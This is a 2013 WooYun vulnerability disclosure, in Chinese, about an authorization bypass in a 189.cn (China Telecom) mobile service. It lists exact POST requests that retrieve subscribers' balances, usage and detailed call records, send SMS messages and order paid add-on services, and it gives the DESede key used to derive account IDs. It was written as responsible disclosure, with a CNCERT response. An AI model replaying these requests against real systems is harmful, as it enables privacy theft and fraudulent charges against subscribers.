漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-017649
漏洞标题:某运营商权限绕过漏洞可导致千万级敏感信息泄漏(包括通话纪录)
相关厂商:189.cn
漏洞作者: O.o
提交时间:2013-01-22 08:41
修复时间:2013-03-08 08:42
公开时间:2013-03-08 08:42
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-01-22: 细节已通知厂商并且等待厂商处理中
2013-01-24: 厂商已经确认,细节仅向厂商公开
2013-02-03: 细节向核心白帽子及相关领域专家公开
2013-02-13: 细节向普通白帽子公开
2013-02-23: 细节向实习白帽子公开
2013-03-08: 细节向公众公开
简要描述:
泄漏信息过于敏感,实现方法过于简单,所以标题和描述不会泄漏信息的才好。
详细说明:
获取用户流量信息
POST HTTP://wapsc.189.cn:8006/wapLogin/getFlow.action
Post值:
accountid=用户ID &channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2
登陆客户端发短信(直接形成短信轰炸)
POST HTTP://wapsc.189.cn:8006/wapLogin/sendSms.action
数据:
accountid=xxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2
查询余额
POST HTTP://wapsc.189.cn:8006/wapLogin/getReal.action
数据
accountid=xxxxxxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2
基础业务情况
POST HTTP://wapsc.189.cn:8006 /BasicBuss/getAllBasicBusiness.action
accNbr=xxxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2
套餐使用量查询
POST HTTP://wapsc.189.cn:8006/productMessage/mealUseCase.action
数据
accountid=xxxxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2
【通话详单】对,没看错。详单。详细到秒!
POST HTTP://wapsc.189.cn:8006/BillDetails/getBillDetail.action
startTime=20130120&endTime=20130121&accNbr=xxxxxxxxxxxxxxxx&type=21&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2
还有些杂七杂八的接口看图把=。=
还有一些远程操纵订购产品
POST HTTP://wapsc.189.cn:8006/businessOperations/getAllValueAdds.action
accountid=xxxxxxxxxxx&pageSize=10¤tPage=1&fuzzyStr=&doType=TYPE1&orderMsg=&isCall=true&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2
会返回当前增值业务列表
找到想要开通的服务,记下goodsId
获取产品valueAddId,变量为goodsid
POST HTTP://wapsc.189.cn:8006/businessOperations/BusOperInfo.action HTTP/1.1
accountid=xxxxxxxxxxxxxx&goodsId=100311&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2
返回(QQ加油站为例)
{"goodsChannel":"ISMP","goodsCode":"123000000000000000434","goodsDesc":"<p>\n\t QQ加油站是腾讯的高端增值业务服务,QQ加油站用户能够享受到腾讯公司所提供的除普通功能以外的40多项增值服务内容。从网站到手机到客户端,QQ加油站用户可以享受比普通用户更多的乐趣,更多惊喜和更优质的服务。同时还可以参与线上线下活动,拥有其他精彩业务的打折特权。<\/p>\n<p>\n\t <\/p>\n<p>\n\t注:此业务属于代扣费(SP)类增值业务。<\/p>\n","goodsId":"100311","goodsName":"腾讯QQ加油站","goodsPrice":"10","service_Company":"深圳腾讯公司"}
取得goodsCode,
订购任意附属包
POST HTTP://wapsc.189.cn:8006/businessOperations/handleBusiness.action HTTP/1.1
accountid=xxxxxxxxx&valueAddId=123000000000000000434&action=1&doType=ISMP&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2
返回
{"effectiveTime":"","expireTime":"20130121125312","message":"成功","resultCode":"0"}
订购成功,!
=============华丽的分割线==============================
Accountid获取算法在包里面有,自己可以写个生成main就能用。
采用了DESede加密算法,采用A314BA5A3C85E86KK887WSWS为密钥
漏洞证明:
详细说明即为漏洞证明
修复方案:
后端多加点东西。
具体你们比我懂
版权声明:转载请注明来源 O.o@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2013-01-24 23:52
厂商回复:
CNVD确认并复现所述情况,已经在23日转由CNCERT四川分中心直接协调当地基础电信运营企业处置。
按完全影响机密性(可遍历),部分影响完整性、可用性进行评分,基本危害评分8.97,发现技术难度系数1.1,涉及行业或单位影响系数1.4,综合rank=13.813
最新状态:
暂无